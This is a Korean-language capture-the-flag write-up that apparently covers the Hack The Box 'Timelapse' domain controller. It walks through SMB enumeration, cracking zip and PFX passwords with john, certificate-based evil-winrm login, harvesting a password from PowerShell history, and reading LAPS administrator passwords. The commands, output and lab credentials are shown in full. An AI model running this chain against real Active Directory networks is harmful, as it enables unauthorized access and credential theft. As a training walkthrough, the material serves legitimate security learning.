1. 정찰
1.1. nmap
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# nmap -sC -sV 10.129.227.113
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-20 14:28 +04
Nmap scan report for 10.129.227.113
Host is up (0.18s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-12-20 18:28:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: 2025-12-20T18:30:22+00:00; +7h59m59s from scanner time.
| tls-alpn:
|_ http/1.1
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-12-20T18:29:44
|_ start_date: N/A
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m58s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.99 seconds
1.2. smbclient 을 통한 공유폴더 식별
smbclient 를 통해서 공유 폴더 목록을 확인했다. 그 중 Shares 폴더에 별도 코멘트가 없는 모습을 확인할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# smbclient -N -L //10.129.227.113
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.227.113 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
1.3. 실패한 정찰
1.3.1. smbmap
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# smbmap -H 10.129.227.113
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[!] Access denied on 10.129.227.113, no fun for you...
[*] Closed 1 connections
1.3.2. rpcclient
enumdomusers 쿼리를 날렸으나 권한이 없어서 확인할 수 없었다.
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# rpcclient -U "" -N 10.129.227.113
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> ^C
2. 내부망 침투
2.1. winrm_backup.zip 파일 확인
Shares 폴더 내부에 winrm_backup.zip 파일이 존재하는 모습을 식별할 수 있다. 통상 백업 파일에 많은 크리덴셜이 있는 점을 감안하면 유용한 정보로 쓸 수 있을 것이다.
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# smbclient -N //10.129.227.113/Shares
Try "help" to get a list of possible commands.
smb: \> recurse ON
smb: \> ls
. D 0 Mon Oct 25 19:39:15 2021
.. D 0 Mon Oct 25 19:39:15 2021
Dev D 0 Mon Oct 25 23:40:06 2021
HelpDesk D 0 Mon Oct 25 19:48:42 2021
\Dev
. D 0 Mon Oct 25 23:40:06 2021
.. D 0 Mon Oct 25 23:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 19:46:42 2021
\HelpDesk
. D 0 Mon Oct 25 19:48:42 2021
.. D 0 Mon Oct 25 19:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 18:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 18:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 18:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 18:57:44 2021
6367231 blocks of size 4096. 1336360 blocks available
2.2. 압축 해제
2.2.1. 압축 해제 실패
파일 압축을 unzip 을 통해 시도했으나 정상적으로 되지 않았다.
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
skipping: legacyy_dev_auth.pfx incorrect password
2.2.2. john 이용 압축 해제
zip2john 을 이용해서 hash 파일로 만든다.
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# zip2john winrm_backup.zip > winrm_backup.hash
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
john 을 이용해서 해당 해쉬 파일을 복호화를 시도한다. 그러면 비밀번호 supremelegacy 를 획득할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt winrm_backup.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2025-12-20 15:08) 8.333g/s 29491Kp/s 29491Kc/s 29491KC/s tabatha916..stefronc
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
획득한 암호를 가지고 압축을 해제하면 legacyy_dev_auth.pfx 파일이 나오는 것을 식별할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
inflating: legacyy_dev_auth.pfx
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# ls
legacyy_dev_auth.pfx winrm_backup.hash winrm_backup.zip
2.3. pfx 파일 암호 해제
2.3.1. pfx 파일이란?
pfx 파일이란 디지털 인증서와 개인키를 하나로 묶어놓은 파일이다. 인증서와 개인키를 따로 보관하면 복잡하므로 한 파일로 묶어놓고 전송하기 위해 제작됐다. 따라서 pfx 의 암호를 알아낸 다음에 공개키와 개인키를 분리해서 저장을 할 것이다.
굳이 공개키와 개인키를 분리해서 추출하는 이유는 evil-winrm 에서는 공개키와 개인키를 통해서 로그인하는 기능을 제공하기 때문에 두 파일을 전달함으로 쉘을 획득하는 방법을 사용할 것이다.
2.3.2. pfx 파일 복호화
pfx2john 을 통해서 해쉬값을 만든다.
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# pfx2john legacyy_dev_auth.pfx > legacyy_dev_auth.pfx.hash
john 을 통해 복호화 해서 비밀번호를 추출했다. thuglegacy 라는 비밀번호를 습득했다.
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt legacyy_dev_auth.pfx.hash
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 ASIMD 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:01:01 DONE (2025-12-20 15:19) 0.01633g/s 52855p/s 52855c/s 52855C/s thyriana..thomasfern
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
2.3.3. 개인키 추출
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key-enc
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# openssl rsa -in legacyy_dev_auth.key-enc -out legacyy_dev_auth.key
Enter pass phrase for legacyy_dev_auth.key-enc:
writing RSA key
2.3.4. 공개키 추출
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crt
Enter Import Password:
2.4. 공개키/개인키 기반 evil-winrm 접속
공개키와 개인키 기반으로 evil-winrm 에 접근하는 것을 확인할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# evil-winrm -i 10.129.227.113 -S -k legacyy_dev_auth.key -c legacyy_dev_auth.crt
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> type ../Desktop/user.txt
3. Lateral Movement
3.1. 권한 확인
whoami /priv 와 whoami /groups 를 살펴보았으나 특별한 권한을 소유하고 있는 것으로 보이지는 않는다.
*Evil-WinRM* PS C:\Users\legacyy> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\legacyy> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\Development Group S-1-5-21-671920749-559770252-3318990721-3101 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
*Evil-WinRM* PS C:\Users\legacyy>
3.2. 실패한 시도
3.3. Powershell History 확인
Linux 에서는 bash history 를 확인하듯이 Windows 에서는 Powershell History 를 확인한다. Powershell History 는 해당 계정 폴더 하위의 \AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt 에 존재한다.
여기서 svc_deploy 에 대한 계정의 비밀번호로 추정되는 것을 획득했다.
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> type ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
3.3.1. 실패한 evil-winrm
획득한 크리덴셜을 통해서 evil-winrm 을 통해 접근하려고 하지만 정상적으로 접근이 되지 않는다. 그 이유는 이번에 연결에서는 SSL 을 지원하는 연결을 시도해야 하기 때문이다. -S 를 안 붙이면 5985(HTTP)번 포트로 접근을 시도하고, -S 를 붙이면 5986(HTTPS)번으로 접근을 시도한다.
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# evil-winrm -i 10.129.227.113 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type HTTPClient::ConnectTimeoutError happened, message is execution expired
Error: Exiting with code 1
3.3.2. 성공한 evil-winrm
-S 를 붙여서 접근하니 정상적으로 쉘을 가져오는 모습을 확인할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# evil-winrm -i 10.129.227.113 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
4. 권한 상승
4.1. 권한 확인
svc_deploy 계정에 대해서 습득했으므로 먼저 권한을 확인한다. 계정에 부여된 특별한 권한은 눈에 들어오는 게 없다.
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
그룹 권한으로 확인했을 때 LAPS_Readers 가 눈에 들어온다.
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\LAPS_Readers Group S-1-5-21-671920749-559770252-3318990721-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
4.2. LAPS_Readers 란
LAPS 란 Local Administrator Password Solution 의 약자로 도메인에 가입된 각 컴퓨터 로컬 관리자(administrator)비밀번호를 수정할 수 있는 권한을 말한다.
그 중에서 Readers 를 갖고 있으므로 비밀번호를 읽을 수 있는 속성을 갖고 있음을 유추할 수 있다.
4.3. 관리자 비밀번호 추출
아래와 같은 파워쉘 스크립트를 통해 각 컴퓨터에 대해 비밀번호를 추출한다. 그 중에 DC01 에 대해서 아래와 같은 비밀번호를 획득했다.
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd | Select-Object Name, ms-Mcs-AdmPwd
Name ms-Mcs-AdmPwd
---- -------------
DC01 fhbY1J#0+#)9N7y2{5k99E69
DB01
WEB01
DEV01
4.4. 관리자 계정 로그인 및 flag 획득
위에서 획득한 관리자 계정 비밀번호를 통해 로그인을 시도했고 성공적으로 접속에 성공했다.
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# evil-winrm -i 10.129.227.113 -u administrator -p 'fhbY1J#0+#)9N7y2{5k99E69' -S
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
특이한 점은 관리자 계정 Desktop 에서 root.txt 를 획득할 수 없었다. 그래서 TRX 계정의 Desktop 에서 flag를 획득한다.
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
Cannot find path 'C:\Users\Administrator\Desktop\root.txt' because it does not exist.
At line:1 char:1
+ type ../Desktop/root.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\Administrator\Desktop\root.txt:String) [Get-Content], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd ..
*Evil-WinRM* PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2021 11:27 AM Administrator
d----- 10/25/2021 8:22 AM legacyy
d-r--- 10/23/2021 11:27 AM Public
d----- 10/25/2021 12:23 PM svc_deploy
d----- 2/23/2022 5:45 PM TRX
*Evil-WinRM* PS C:\Users> cd TRX
*Evil-WinRM* PS C:\Users\TRX> type Desktop/root.txt